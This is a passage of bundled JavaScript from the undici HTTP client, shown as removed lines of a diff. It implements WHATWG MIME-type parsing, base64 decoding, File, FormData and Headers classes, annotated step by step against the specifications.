https://mimesniff.spec.whatwg.org/#mime-type - const mimeType = { - type: typeLowercase, - subtype: subtypeLowercase, - /** @type {Map} */ - parameters: new Map(), - // https://mimesniff.spec.whatwg.org/#mime-type-essence - essence: `${typeLowercase}/${subtypeLowercase}` - } - - // 11. While position is not past the end of input: - while (position.position < input.length) { - // 1. Advance position by 1. (This skips past U+003B (;).) - position.position++ - - // 2. Collect a sequence of code points that are HTTP - // whitespace from input given position. - collectASequenceOfCodePoints( - // https://fetch.spec.whatwg.org/#http-whitespace - char => HTTP_WHITESPACE_REGEX.test(char), - input, - position - ) - - // 3. Let parameterName be the result of collecting a - // sequence of code points that are not U+003B (;) - // or U+003D (=) from input, given position. - let parameterName = collectASequenceOfCodePoints( - (char) => char !== ';' && char !== '=', - input, - position - ) - - // 4. Set parameterName to parameterName, in ASCII - // lowercase. - parameterName = parameterName.toLowerCase() - - // 5. If position is not past the end of input, then: - if (position.position < input.length) { - // 1. If the code point at position within input is - // U+003B (;), then continue. - if (input[position.position] === ';') { - continue - } - - // 2. Advance position by 1. (This skips past U+003D (=).) - position.position++ - } - - // 6. If position is past the end of input, then break. - if (position.position > input.length) { - break - } - - // 7. Let parameterValue be null. - let parameterValue = null - - // 8. If the code point at position within input is - // U+0022 ("), then: - if (input[position.position] === '"') { - // 1. Set parameterValue to the result of collecting - // an HTTP quoted string from input, given position - // and the extract-value flag. - parameterValue = collectAnHTTPQuotedString(input, position, true) - - // 2. Collect a sequence of code points that are not - // U+003B (;) from input, given position. - collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 9. Otherwise: - } else { - // 1. Set parameterValue to the result of collecting - // a sequence of code points that are not U+003B (;) - // from input, given position. - parameterValue = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 2. Remove any trailing HTTP whitespace from parameterValue. - parameterValue = removeHTTPWhitespace(parameterValue, false, true) - - // 3. If parameterValue is the empty string, then continue. - if (parameterValue.length === 0) { - continue - } - } - - // 10. If all of the following are true - // - parameterName is not the empty string - // - parameterName solely contains HTTP token code points - // - parameterValue solely contains HTTP quoted-string token code points - // - mimeType’s parameters[parameterName] does not exist - // then set mimeType’s parameters[parameterName] to parameterValue. - if ( - parameterName.length !== 0 && - HTTP_TOKEN_CODEPOINTS.test(parameterName) && - (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && - !mimeType.parameters.has(parameterName) - ) { - mimeType.parameters.set(parameterName, parameterValue) - } - } - - // 12. Return mimeType. - return mimeType -} - -// https://infra.spec.whatwg.org/#forgiving-base64-decode -/** @param {string} data */ -function forgivingBase64 (data) { - // 1. Remove all ASCII whitespace from data. - data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line - - // 2. If data’s code point length divides by 4 leaving - // no remainder, then: - if (data.length % 4 === 0) { - // 1. If data ends with one or two U+003D (=) code points, - // then remove them from data. - data = data.replace(/=?=$/, '') - } - - // 3. If data’s code point length divides by 4 leaving - // a remainder of 1, then return failure. - if (data.length % 4 === 1) { - return 'failure' - } - - // 4. If data contains a code point that is not one of - // U+002B (+) - // U+002F (/) - // ASCII alphanumeric - // then return failure. - if (/[^+/0-9A-Za-z]/.test(data)) { - return 'failure' - } - - const binary = atob(data) - const bytes = new Uint8Array(binary.length) - - for (let byte = 0; byte < binary.length; byte++) { - bytes[byte] = binary.charCodeAt(byte) - } - - return bytes -} - -// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string -// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string -/** - * @param {string} input - * @param {{ position: number }} position - * @param {boolean?} extractValue - */ -function collectAnHTTPQuotedString (input, position, extractValue) { - // 1. Let positionStart be position. - const positionStart = position.position - - // 2. Let value be the empty string. - let value = '' - - // 3. Assert: the code point at position within input - // is U+0022 ("). - assert(input[position.position] === '"') - - // 4. Advance position by 1. - position.position++ - - // 5. While true: - while (true) { - // 1. Append the result of collecting a sequence of code points - // that are not U+0022 (") or U+005C (\) from input, given - // position, to value. - value += collectASequenceOfCodePoints( - (char) => char !== '"' && char !== '\\', - input, - position - ) - - // 2. If position is past the end of input, then break. - if (position.position >= input.length) { - break - } - - // 3. Let quoteOrBackslash be the code point at position within - // input. - const quoteOrBackslash = input[position.position] - - // 4. Advance position by 1. - position.position++ - - // 5. If quoteOrBackslash is U+005C (\), then: - if (quoteOrBackslash === '\\') { - // 1. If position is past the end of input, then append - // U+005C (\) to value and break. - if (position.position >= input.length) { - value += '\\' - break - } - - // 2. Append the code point at position within input to value. - value += input[position.position] - - // 3. Advance position by 1. - position.position++ - - // 6. Otherwise: - } else { - // 1. Assert: quoteOrBackslash is U+0022 ("). - assert(quoteOrBackslash === '"') - - // 2. Break. - break - } - } - - // 6. If the extract-value flag is set, then return value. - if (extractValue) { - return value - } - - // 7. Return the code points from positionStart to position, - // inclusive, within input. - return input.slice(positionStart, position.position) -} - -/** - * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type - */ -function serializeAMimeType (mimeType) { - assert(mimeType !== 'failure') - const { parameters, essence } = mimeType - - // 1. Let serialization be the concatenation of mimeType’s - // type, U+002F (/), and mimeType’s subtype. - let serialization = essence - - // 2. For each name → value of mimeType’s parameters: - for (let [name, value] of parameters.entries()) { - // 1. Append U+003B (;) to serialization. - serialization += ';' - - // 2. Append name to serialization. - serialization += name - - // 3. Append U+003D (=) to serialization. - serialization += '=' - - // 4. If value does not solely contain HTTP token code - // points or value is the empty string, then: - if (!HTTP_TOKEN_CODEPOINTS.test(value)) { - // 1. Precede each occurence of U+0022 (") or - // U+005C (\) in value with U+005C (\). - value = value.replace(/(\\|")/g, '\\$1') - - // 2. Prepend U+0022 (") to value. - value = '"' + value - - // 3. Append U+0022 (") to value. - value += '"' - } - - // 5. Append value to serialization. - serialization += value - } - - // 3. Return serialization. - return serialization -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} char - */ -function isHTTPWhiteSpace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === ' ' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} str - */ -function removeHTTPWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -/** - * @see https://infra.spec.whatwg.org/#ascii-whitespace - * @param {string} char - */ -function isASCIIWhitespace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' -} - -/** - * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace - */ -function removeASCIIWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -module.exports = { - dataURLProcessor, - URLSerializer, - collectASequenceOfCodePoints, - collectASequenceOfCodePointsFast, - stringPercentDecode, - parseMIMEType, - collectAnHTTPQuotedString, - serializeAMimeType -} - - -/***/ }), - -/***/ 8511: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { types } = __nccwpck_require__(3837) -const { kState } = __nccwpck_require__(5861) -const { isBlobLike } = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const encoder = new TextEncoder() - -class File extends Blob { - constructor (fileBits, fileName, options = {}) { - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) - - fileBits = webidl.converters['sequence'](fileBits) - fileName = webidl.converters.USVString(fileName) - options = webidl.converters.FilePropertyBag(options) - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - // Note: Blob handles this for us - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // 2. Convert every character in t to ASCII lowercase. - let t = options.type - let d - - // eslint-disable-next-line no-labels - substep: { - if (t) { - t = parseMIMEType(t) - - if (t === 'failure') { - t = '' - // eslint-disable-next-line no-labels - break substep - } - - t = serializeAMimeType(t).toLowerCase() - } - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - d = options.lastModified - } - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. - - super(processBlobParts(fileBits, options), { type: t }) - this[kState] = { - name: n, - lastModified: d, - type: t - } - } - - get name () { - webidl.brandCheck(this, File) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, File) - - return this[kState].lastModified - } - - get type () { - webidl.brandCheck(this, File) - - return this[kState].type - } -} - -class FileLike { - constructor (blobLike, fileName, options = {}) { - // TODO: argument idl type check - - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // TODO - const t = options.type - - // 2. Convert every character in t to ASCII lowercase. - // TODO - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - const d = options.lastModified ?? Date.now() - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. - - this[kState] = { - blobLike, - name: n, - type: t, - lastModified: d - } - } - - stream (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.stream(...args) - } - - arrayBuffer (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.arrayBuffer(...args) - } - - slice (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.slice(...args) - } - - text (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.text(...args) - } - - get size () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.size - } - - get type () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.type - } - - get name () { - webidl.brandCheck(this, FileLike) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, FileLike) - - return this[kState].lastModified - } - - get [Symbol.toStringTag] () { - return 'File' - } -} - -Object.defineProperties(File.prototype, { - [Symbol.toStringTag]: { - value: 'File', - configurable: true - }, - name: kEnumerableProperty, - lastModified: kEnumerableProperty -}) - -webidl.converters.Blob = webidl.interfaceConverter(Blob) - -webidl.converters.BlobPart = function (V, opts) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if ( - ArrayBuffer.isView(V) || - types.isAnyArrayBuffer(V) - ) { - return webidl.converters.BufferSource(V, opts) - } - } - - return webidl.converters.USVString(V, opts) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.BlobPart -) - -// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag -webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ - { - key: 'lastModified', - converter: webidl.converters['long long'], - get defaultValue () { - return Date.now() - } - }, - { - key: 'type', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'endings', - converter: (value) => { - value = webidl.converters.DOMString(value) - value = value.toLowerCase() - - if (value !== 'native') { - value = 'transparent' - } - - return value - }, - defaultValue: 'transparent' - } -]) - -/** - * @see https://www.w3.org/TR/FileAPI/#process-blob-parts - * @param {(NodeJS.TypedArray|Blob|string)[]} parts - * @param {{ type: string, endings: string }} options - */ -function processBlobParts (parts, options) { - // 1. Let bytes be an empty sequence of bytes. - /** @type {NodeJS.TypedArray[]} */ - const bytes = [] - - // 2. For each element in parts: - for (const element of parts) { - // 1. If element is a USVString, run the following substeps: - if (typeof element === 'string') { - // 1. Let s be element. - let s = element - - // 2. If the endings member of options is "native", set s - // to the result of converting line endings to native - // of element. - if (options.endings === 'native') { - s = convertLineEndingsNative(s) - } - - // 3. Append the result of UTF-8 encoding s to bytes. - bytes.push(encoder.encode(s)) - } else if ( - types.isAnyArrayBuffer(element) || - types.isTypedArray(element) - ) { - // 2. If element is a BufferSource, get a copy of the - // bytes held by the buffer source, and append those - // bytes to bytes. - if (!element.buffer) { // ArrayBuffer - bytes.push(new Uint8Array(element)) - } else { - bytes.push( - new Uint8Array(element.buffer, element.byteOffset, element.byteLength) - ) - } - } else if (isBlobLike(element)) { - // 3. If element is a Blob, append the bytes it represents - // to bytes. - bytes.push(element) - } - } - - // 3. Return bytes. - return bytes -} - -/** - * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native - * @param {string} s - */ -function convertLineEndingsNative (s) { - // 1. Let native line ending be be the code point U+000A LF. - let nativeLineEnding = '\n' - - // 2. If the underlying platform’s conventions are to - // represent newlines as a carriage return and line feed - // sequence, set native line ending to the code point - // U+000D CR followed by the code point U+000A LF. - if (process.platform === 'win32') { - nativeLineEnding = '\r\n' - } - - return s.replace(/\r?\n/g, nativeLineEnding) -} - -// If this function is moved to ./util.js, some tools (such as -// rollup) will warn about circular dependencies. See: -// https://github.com/nodejs/undici/issues/1629 -function isFileLike (object) { - return ( - (NativeFile && object instanceof NativeFile) || - object instanceof File || ( - object && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - object[Symbol.toStringTag] === 'File' - ) - ) -} - -module.exports = { File, FileLike, isFileLike } - - -/***/ }), - -/***/ 2015: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) -const { kState } = __nccwpck_require__(5861) -const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) -const { webidl } = __nccwpck_require__(1744) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile - -// https://xhr.spec.whatwg.org/#formdata -class FormData { - constructor (form) { - if (form !== undefined) { - throw webidl.errors.conversionFailed({ - prefix: 'FormData constructor', - argument: 'Argument 1', - types: ['undefined'] - }) - } - - this[kState] = [] - } - - append (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? webidl.converters.USVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with - // name, value, and filename if given. - const entry = makeEntry(name, value, filename) - - // 3. Append entry to this’s entry list. - this[kState].push(entry) - } - - delete (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) - - name = webidl.converters.USVString(name) - - // The delete(name) method steps are to remove all entries whose name - // is name from this’s entry list. - this[kState] = this[kState].filter(entry => entry.name !== name) - } - - get (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return null. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx === -1) { - return null - } - - // 2. Return the value of the first entry whose name is name from - // this’s entry list. - return this[kState][idx].value - } - - getAll (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) - - name = webidl.converters.USVString(name) - - // 1. If there is no entry whose name is name in this’s entry list, - // then return the empty list. - // 2. Return the values of all entries whose name is name, in order, - // from this’s entry list. - return this[kState] - .filter((entry) => entry.name === name) - .map((entry) => entry.value) - } - - has (name) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) - - name = webidl.converters.USVString(name) - - // The has(name) method steps are to return true if there is an entry - // whose name is name in this’s entry list; otherwise false. - return this[kState].findIndex((entry) => entry.name === name) !== -1 - } - - set (name, value, filename = undefined) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) - - if (arguments.length === 3 && !isBlobLike(value)) { - throw new TypeError( - "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" - ) - } - - // The set(name, value) and set(name, blobValue, filename) method steps - // are: - - // 1. Let value be value if given; otherwise blobValue. - - name = webidl.converters.USVString(name) - value = isBlobLike(value) - ? webidl.converters.Blob(value, { strict: false }) - : webidl.converters.USVString(value) - filename = arguments.length === 3 - ? toUSVString(filename) - : undefined - - // 2. Let entry be the result of creating an entry with name, value, and - // filename if given. - const entry = makeEntry(name, value, filename) - - // 3. If there are entries in this’s entry list whose name is name, then - // replace the first such entry with entry and remove the others. - const idx = this[kState].findIndex((entry) => entry.name === name) - if (idx !== -1) { - this[kState] = [ - ...this[kState].slice(0, idx), - entry, - ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) - ] - } else { - // 4. Otherwise, append entry to this’s entry list. - this[kState].push(entry) - } - } - - entries () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key+value' - ) - } - - keys () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'key' - ) - } - - values () { - webidl.brandCheck(this, FormData) - - return makeIterator( - () => this[kState].map(pair => [pair.name, pair.value]), - 'FormData', - 'value' - ) - } - - /** - * @param {(value: string, key: string, self: FormData) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, FormData) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } -} - -FormData.prototype[Symbol.iterator] = FormData.prototype.entries - -Object.defineProperties(FormData.prototype, { - [Symbol.toStringTag]: { - value: 'FormData', - configurable: true - } -}) - -/** - * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry - * @param {string} name - * @param {string|Blob} value - * @param {?string} filename - * @returns - */ -function makeEntry (name, value, filename) { - // 1. Set name to the result of converting name into a scalar value string. - // "To convert a string into a scalar value string, replace any surrogates - // with U+FFFD." - // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end - name = Buffer.from(name).toString('utf8') - - // 2. If value is a string, then set value to the result of converting - // value into a scalar value string. - if (typeof value === 'string') { - value = Buffer.from(value).toString('utf8') - } else { - // 3. Otherwise: - - // 1. If value is not a File object, then set value to a new File object, - // representing the same bytes, whose name attribute value is "blob" - if (!isFileLike(value)) { - value = value instanceof Blob - ? new File([value], 'blob', { type: value.type }) - : new FileLike(value, 'blob', { type: value.type }) - } - - // 2. If filename is given, then set value to a new File object, - // representing the same bytes, whose name attribute is filename. - if (filename !== undefined) { - /** @type {FilePropertyBag} */ - const options = { - type: value.type, - lastModified: value.lastModified - } - - value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile - ? new File([value], filename, options) - : new FileLike(value, filename, options) - } - } - - // 4. Return an entry whose name is name and whose value is value. - return { name, value } -} - -module.exports = { FormData } - - -/***/ }), - -/***/ 1246: -/***/ ((module) => { - -"use strict"; - - -// In case of breaking changes, increase the version -// number to avoid conflicts. -const globalOrigin = Symbol.for('undici.globalOrigin.1') - -function getGlobalOrigin () { - return globalThis[globalOrigin] -} - -function setGlobalOrigin (newOrigin) { - if (newOrigin === undefined) { - Object.defineProperty(globalThis, globalOrigin, { - value: undefined, - writable: true, - enumerable: false, - configurable: false - }) - - return - } - - const parsedURL = new URL(newOrigin) - - if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { - throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) - } - - Object.defineProperty(globalThis, globalOrigin, { - value: parsedURL, - writable: true, - enumerable: false, - configurable: false - }) -} - -module.exports = { - getGlobalOrigin, - setGlobalOrigin -} - - -/***/ }), - -/***/ 554: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const { kGuard } = __nccwpck_require__(5861) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { - makeIterator, - isValidHeaderName, - isValidHeaderValue -} = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const assert = __nccwpck_require__(9491) - -const kHeadersMap = Symbol('headers map') -const kHeadersSortedMap = Symbol('headers map sorted') - -/** - * @param {number} code - */ -function isHTTPWhiteSpaceCharCode (code) { - return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize - * @param {string} potentialValue - */ -function headerValueNormalize (potentialValue) { - // To normalize a byte sequence potentialValue, remove - // any leading and trailing HTTP whitespace bytes from - // potentialValue. - let i = 0; let j = potentialValue.length - - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j - while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i - - return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) -} - -function fill (headers, object) { - // To fill a Headers object headers with a given object object, run these steps: - - // 1. If object is a sequence, then for each header in object: - // Note: webidl conversion to array has already been done. - if (Array.isArray(object)) { - for (let i = 0; i < object.length; ++i) { - const header = object[i] - // 1. If header does not contain exactly two items, then throw a TypeError. - if (header.length !== 2) { - throw webidl.errors.exception({ - header: 'Headers constructor', - message: `expected name/value pair to be length 2, found ${header.length}.` - }) - } - - // 2. Append (header’s first item, header’s second item) to headers. - appendHeader(headers, header[0], header[1]) - } - } else if (typeof object === 'object' && object !== null) { - // Note: null should throw - - // 2. Otherwise, object is a record, then for each key → value in object, - // append (key, value) to headers - const keys = Object.keys(object) - for (let i = 0; i < keys.length; ++i) { - appendHeader(headers, keys[i], object[keys[i]]) - } - } else { - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) - } -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-headers-append - */ -function appendHeader (headers, name, value) { - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.append', - value, - type: 'header value' - }) - } - - // 3. If headers’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if headers’s guard is "request" and name is a - // forbidden header name, return. - // Note: undici does not implement forbidden header names - if (headers[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (headers[kGuard] === 'request-no-cors') { - // 5. Otherwise, if headers’s guard is "request-no-cors": - // TODO - } - - // 6. Otherwise, if headers’s guard is "response" and name is a - // forbidden response-header name, return. - - // 7. Append (name, value) to headers’s header list. - return headers[kHeadersList].append(name, value) - - // 8. If headers’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from headers -} - -class HeadersList { - /** @type {[string, string][]|null} */ - cookies = null - - constructor (init) { - if (init instanceof HeadersList) { - this[kHeadersMap] = new Map(init[kHeadersMap]) - this[kHeadersSortedMap] = init[kHeadersSortedMap] - this.cookies = init.cookies === null ? null : [...init.cookies] - } else { - this[kHeadersMap] = new Map(init) - this[kHeadersSortedMap] = null - } - } - - // https://fetch.spec.whatwg.org/#header-list-contains - contains (name) { - // A header list list contains a header name name if list - // contains a header whose name is a byte-case-insensitive - // match for name. - name = name.toLowerCase() - - return this[kHeadersMap].has(name) - } - - clear () { - this[kHeadersMap].clear() - this[kHeadersSortedMap] = null - this.cookies = null - } - - // https://fetch.spec.whatwg.org/#concept-header-list-append - append (name, value) { - this[kHeadersSortedMap] = null - - // 1. If list contains name, then set name to the first such - // header’s name. - const lowercaseName = name.toLowerCase() - const exists = this[kHeadersMap].get(lowercaseName) - - // 2. Append (name, value) to list. - if (exists) { - const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' - this[kHeadersMap].set(lowercaseName, { - name: exists.name, - value: `${exists.value}${delimiter}${value}` - }) - } else { - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - if (lowercaseName === 'set-cookie') { - this.cookies ??= [] - this.cookies.push(value) - } - } - - // https://fetch.spec.whatwg.org/#concept-header-list-set - set (name, value) { - this[kHeadersSortedMap] = null - const lowercaseName = name.toLowerCase() - - if (lowercaseName === 'set-cookie') { - this.cookies = [value] - } - - // 1. If list contains name, then set the value of - // the first such header to value and remove the - // others. - // 2. Otherwise, append header (name, value) to list. - this[kHeadersMap].set(lowercaseName, { name, value }) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-delete - delete (name) { - this[kHeadersSortedMap] = null - - name = name.toLowerCase() - - if (name === 'set-cookie') { - this.cookies = null - } - - this[kHeadersMap].delete(name) - } - - // https://fetch.spec.whatwg.org/#concept-header-list-get - get (name) { - const value = this[kHeadersMap].get(name.toLowerCase()) - - // 1. If list does not contain name, then return null. - // 2. Return the values of all headers in list whose name - // is a byte-case-insensitive match for name, - // separated from each other by 0x2C 0x20, in order. - return value === undefined ? null : value.value - } - - * [Symbol.iterator] () { - // use the lowercased name - for (const [name, { value }] of this[kHeadersMap]) { - yield [name, value] - } - } - - get entries () { - const headers = {} - - if (this[kHeadersMap].size) { - for (const { name, value } of this[kHeadersMap].values()) { - headers[name] = value - } - } - - return headers - } -} - -// https://fetch.spec.whatwg.org/#headers-class -class Headers { - constructor (init = undefined) { - if (init === kConstruct) { - return - } - this[kHeadersList] = new HeadersList() - - // The new Headers(init) constructor steps are: - - // 1. Set this’s guard to "none". - this[kGuard] = 'none' - - // 2. If init is given, then fill this with init. - if (init !== undefined) { - init = webidl.converters.HeadersInit(init) - fill(this, init) - } - } - - // https://fetch.spec.whatwg.org/#dom-headers-append - append (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - return appendHeader(this, name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-delete - delete (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.delete', - value: name, - type: 'header name' - }) - } - - // 2. If this’s guard is "immutable", then throw a TypeError. - // 3. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 4. Otherwise, if this’s guard is "request-no-cors", name - // is not a no-CORS-safelisted request-header name, and - // name is not a privileged no-CORS request-header name, - // return. - // 5. Otherwise, if this’s guard is "response" and name is - // a forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 6. If this’s header list does not contain name, then - // return. - if (!this[kHeadersList].contains(name)) { - return - } - - // 7. Delete name from this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this. - this[kHeadersList].delete(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-get - get (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.get', - value: name, - type: 'header name' - }) - } - - // 2. Return the result of getting name from this’s header - // list. - return this[kHeadersList].get(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-has - has (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.has', - value: name, - type: 'header name' - }) - } - - // 2. Return true if this’s header list contains name; - // otherwise false. - return this[kHeadersList].contains(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-set - set (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, 